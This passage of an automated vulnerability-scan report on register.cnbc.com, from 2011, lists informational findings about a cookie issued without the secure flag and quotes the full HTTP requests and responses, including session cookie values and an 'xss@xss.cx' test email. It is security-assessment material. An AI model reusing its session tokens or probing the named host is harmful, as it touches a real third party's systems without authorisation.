Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT
ETag: "2a54-49fc8d80f4e80"
Accept-Ranges: bytes
Content-Length: 10836
Connection: close
Content-Type: text/css
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

.bodyclass {
margin-top: 0px;
background-image:url(../images/tile.gif);
background-repeat:repeat;

}
.regis_copyright {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 11px;
   font-
...[SNIP]...

7.48. https://register.cnbc.com/email/EmailSupport.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/email/EmailSupport.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /email/EmailSupport.jsp HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:43 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/
Content-Length: 91322

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<script lang="javascript" src="js/subjects.js"></script>
<title>Contact Customer Service</
...[SNIP]...

7.49. https://register.cnbc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:54 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E; TZM=-300; s_cc=true; s_nr=1315339311702; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:01:54 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Length: 209
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:54 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

7.50. https://register.cnbc.com/forgotPassword1.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/forgotPassword1.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:02:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /forgotPassword1.do HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
Content-Length: 45
Cache-Control: max-age=0
Origin: https://register.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E; TZM=-300; s_cc=true; s_nr=1315339333234; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/images/clickToContinue.gif%2526ot%253DIMAGE

step=step1&emailAddress=xss%40xss.cx&x=21&y=7

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:14 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:02:14 GMT; path=/
Content-Length: 85679

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<title>Reset Password</title>
<link href="/css/member_center_sytles.css" rel="stylesheet" typ
...[SNIP]...

7.51. https://register.cnbc.com/forgotpassword1.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/forgotpassword1.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:47 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forgotpassword1.jsp HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:01:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://register.cnbc.com/forgotPassword.do
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:47 GMT; path=/

7.52. https://register.cnbc.com/images/clickToContinue.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/images/clickToContinue.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/clickToContinue.gif HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:50 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Fri, 29 May 2009 14:10:16 GMT
ETag: "4a4-46b0da2bec200"
Accept-Ranges: bytes
Content-Length: 1188
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:50 GMT
Connection: close
Content-Type: image/gif
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/

GIF89a~.................................BHXNSbOTcY^l[`nZ_m~..|..............ejvhmypu.ty.............rw..................................................................................................
...[SNIP]...

7.53. https://register.cnbc.com/images/loaderImage.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/images/loaderImage.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/loaderImage.gif HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "109e-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 4254
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:40 GMT
Connection: close
Content-Type: image/gif
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

GIF89a.......,*,.........dfd...............DFD...trt..................464.........ljl............TVT...tvt...!..NETSCAPE2.0.....!.......,............$j..Ab.J..I.*U.*..).*..@$.........\N....(.:
H..Cd6
...[SNIP]...

7.54. https://register.cnbc.com/images/memberCenterHeader.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/images/memberCenterHeader.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/memberCenterHeader.jpg HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:50 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "2a29-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 10793
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:50 GMT
Connection: close
Content-Type: image/jpeg
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/

......JFIF.....H.H.....5Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:02:10 13:45:24.........
...[SNIP]...

7.55. https://register.cnbc.com/images/submitPreferences.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/images/submitPreferences.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/submitPreferences.jpg HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "334c-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 13132
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:40 GMT
Connection: close
Content-Type: image/jpeg
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:02:10 13:53:01.........
...[SNIP]...

7.56. https://register.cnbc.com/images/tick.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/images/tick.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/tick.jpg HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "3a40-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 14912
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:40 GMT
Connection: close
Content-Type: image/jpeg
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

......JFIF.....H.H..... Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:03:12 10:28:37.........
...[SNIP]...

7.57. https://register.cnbc.com/images/tile_02.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/images/tile_02.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/tile_02.gif HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:50 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT
ETag: "2c-49fc8d80f4e80"
Accept-Ranges: bytes
Content-Length: 44
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:50 GMT
Connection: close
Content-Type: image/gif
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/

GIF89a.......02;68@!.......,...........DnX.;

7.58. https://register.cnbc.com/images/wrong.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/images/wrong.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/wrong.jpg HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "3d8b-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 15755
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:40 GMT
Connection: close
Content-Type: image/jpeg
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:03:12 10:43:29.........
...[SNIP]...

7.59. https://register.cnbc.com/js/membercenter.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/js/membercenter.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/membercenter.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:49 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "13eb-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 5099
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

//This variable is the only one that needs to be changed when the free web cam offer expires
var freeWebCamOffer="false";
//var freeWebCamOffer="true";

//We need to use the db index of "United States
...[SNIP]...

7.60. https://register.cnbc.com/js/prototype_ajax.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/js/prototype_ajax.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/prototype_ajax.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "1756a-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 95594
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

/* Prototype JavaScript framework, version 1.5.0
* (c) 2005-2007 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype
...[SNIP]...

7.61. https://register.cnbc.com/js/registrationBasic.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/js/registrationBasic.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/registrationBasic.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 20 Jan 2010 20:57:35 GMT
ETag: "3e22-47d9ed5f8cdc0"
Accept-Ranges: bytes
Content-Length: 15906
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

//Field Validations - start
var goOptions = true;
var goAddrs1 = true;
var goAddrs2 = true;
var goPhone = true;
var goHhi = true;
var goIndustry = true;
var goStDsc = true;
var goCity = true;
...[SNIP]...

7.62. https://register.cnbc.com/js/registrationUtils.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/js/registrationUtils.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/registrationUtils.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Tue, 11 Aug 2009 10:38:41 GMT
